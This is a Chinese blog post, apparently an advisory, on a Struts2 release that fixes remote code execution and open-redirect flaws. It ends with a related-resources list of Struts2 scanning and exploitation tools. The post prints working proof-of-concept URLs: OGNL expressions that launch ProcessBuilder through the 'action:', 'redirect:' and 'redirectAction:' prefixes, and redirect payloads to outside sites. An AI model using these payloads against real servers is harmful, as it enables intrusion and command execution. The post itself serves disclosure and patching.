`

Struts2重要漏洞

阅读更多



该版本修复的主要安全漏洞如下: 

1.  通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下: 

代码 
  1. http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  
  2.   
  3. http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  
  4.   
  5. http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  


 


2.  通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下: 

代码 
  1. http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/  
  2.   
  3. http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23  




详细漏洞信息: 

建议开发者将所有Struts 2应用程序升级至最新版本。 

如果你从其他分支迁移至2.3.x分支,需要注意,该分支最低要求Servlet API 2.4、JSP API 2.0和Java 5。 

下载地址:http://struts.apache.org/
分享到:
评论

相关推荐

    Struts2漏洞检查工具Struts2.2019.V2.3

    然而,随着时间的推移,Struts2在安全方面暴露出了一些重要的漏洞,这给使用该框架的系统带来了潜在的安全风险。"Struts2漏洞检查工具Struts2.2019.V2.3"是一个专门针对这些漏洞进行检测的工具,旨在帮助开发者和...

    全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新

    渗透测试是网络安全的重要环节,通过使用这样的工具,不仅可以帮助开发者找出并修复Struts 2中的漏洞,还能提高整体的安全意识,建立更为健壮的安全防御体系。对于企业来说,定期进行这样的安全检查,可以降低被黑客...

    K8 Struts2 Exp 20160516(Struts2综合漏洞利用工具)

    总的来说,Struts2漏洞是企业信息安全的重要威胁,需要开发者和运维人员时刻保持警惕,通过持续的安全更新和严格的安全策略来降低风险。而“K8 Struts2 Exp 20160516”这样的工具提醒我们,对安全漏洞的利用工具必须...

    Struts2漏洞利用工具2019版 V2.3.zip

    "Struts2漏洞利用工具2019版 V2.3.zip" 是一个针对这些安全漏洞的检测和利用工具,用于帮助安全研究人员和系统管理员识别和修复Struts2框架的安全问题。 首先,Struts2框架的最著名的漏洞之一是S2-045,这是一个...

    struts2漏洞利用工具

    总的来说,Struts2漏洞利用工具是安全社区的重要工具,它帮助我们识别和修复可能的威胁。但是,任何工具的使用都应谨慎,确保其不会对合法业务造成负面影响。了解并掌握这些漏洞的原理,能够帮助我们更好地保护Web...

    Struts2漏洞检查工具2018版.zip

    2018年,针对Struts2的安全漏洞,出现了多个重要的更新和补丁。"Struts2漏洞检查工具2018版.zip"这个压缩包很可能包含了专门用于检测Struts2框架是否存在这些安全漏洞的工具。`Struts2漏洞检查工具2018版.exe`可能是...

    Struts2漏洞检查工具2018版.rar

    总的来说,Struts2漏洞检查工具2018版是一个重要的安全资源,它可以帮助维护Struts2应用的安全性,防止可能的恶意攻击。在使用该工具时,应当遵循合法的使用规则,仅用于授权环境下的安全测试,避免触犯法律法规。

    Struts2漏洞检查工具2017版

    然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能被恶意攻击者利用来执行任意代码,对系统安全构成严重威胁。本"Struts2漏洞检查工具2017版"正是针对这些问题而设计的,它包含了对多个已知...

    Struts2漏洞利用工具-可用于检测

    总的来说,了解并防范Struts2漏洞对于任何使用或维护基于Struts2的系统的人员都至关重要。定期进行安全评估,使用像“Struts2漏洞利用工具”这样的资源,以及遵循最佳安全实践,可以帮助保护系统免受潜在的恶意攻击...

    Struts2-045漏洞利用工具

    总的来说,了解并应对Struts2-045漏洞对于维护网络安全至关重要。开发者应确保更新到不受影响的Struts2版本,或者应用官方提供的补丁。同时,安全团队和渗透测试人员可以利用工具如`s2exp.py`进行漏洞扫描和风险评估...

    Struts2-漏洞检查工具2018版.zip

    同时,保持Struts2框架及其相关插件的最新版本也是至关重要的,因为新版本通常会修复已知的安全漏洞。此外,良好的编程习惯,如输入验证、错误处理和最小权限原则的遵循,也能增强应用的安全性。

    struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx

    同时,我们也可以了解到 Struts2 漏洞 S2-045 的成因和解决方法,对于企业级应用程序的安全性具有重要意义。 参考文献 Apache Struts 2 - S2-045 Vulnerability. (n.d.). Retrieved from Struts 2 -Downloads. ...

    K8_Struts2_漏洞利用工具解压密码:k8team

    总的来说,了解和掌握Struts2漏洞利用的原理和防范措施对于维护网络安全至关重要。通过使用如K8_Struts2_漏洞利用工具这样的资源,我们可以更好地理解这些威胁,提高我们的防护能力,保护Web应用程序免受恶意攻击。

    struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_

    总的来说,Struts2漏洞的检测和预防是保障Web应用安全的重要环节,"struts2-scan"这样的工具为这个过程提供了有力的支持。通过深入了解这些漏洞和防范措施,开发者可以更好地保护他们的应用程序免受攻击。

    Struts2漏洞检查工具

    因此,对于使用Struts2的开发者和系统管理员来说,定期进行Struts2漏洞检查至关重要。 Struts2漏洞检查工具正是为了解决这个问题而设计的,它可以帮助用户快速识别和修复可能存在的安全问题。这款工具通常包含一...

    struts2 漏洞利用工具.rar

    综上所述,Struts2漏洞利用工具是用于测试和防范Struts2框架潜在安全风险的重要资源,而理解并应对这些漏洞对于保障Web应用程序的安全至关重要。在使用这些工具时,务必遵守合法性和道德规范,只用于授权的测试和...

    Struts2漏洞利用工具Devmode版

    总之,"Struts2漏洞利用工具Devmode版"是网络安全领域的重要工具,它帮助我们识别并解决Struts2框架的潜在风险,提升系统的安全性。了解和掌握这种工具的使用方法,对于任何负责维护基于Struts2的Web应用的人员来说...

Global site tag (gtag.js) - Google Analytics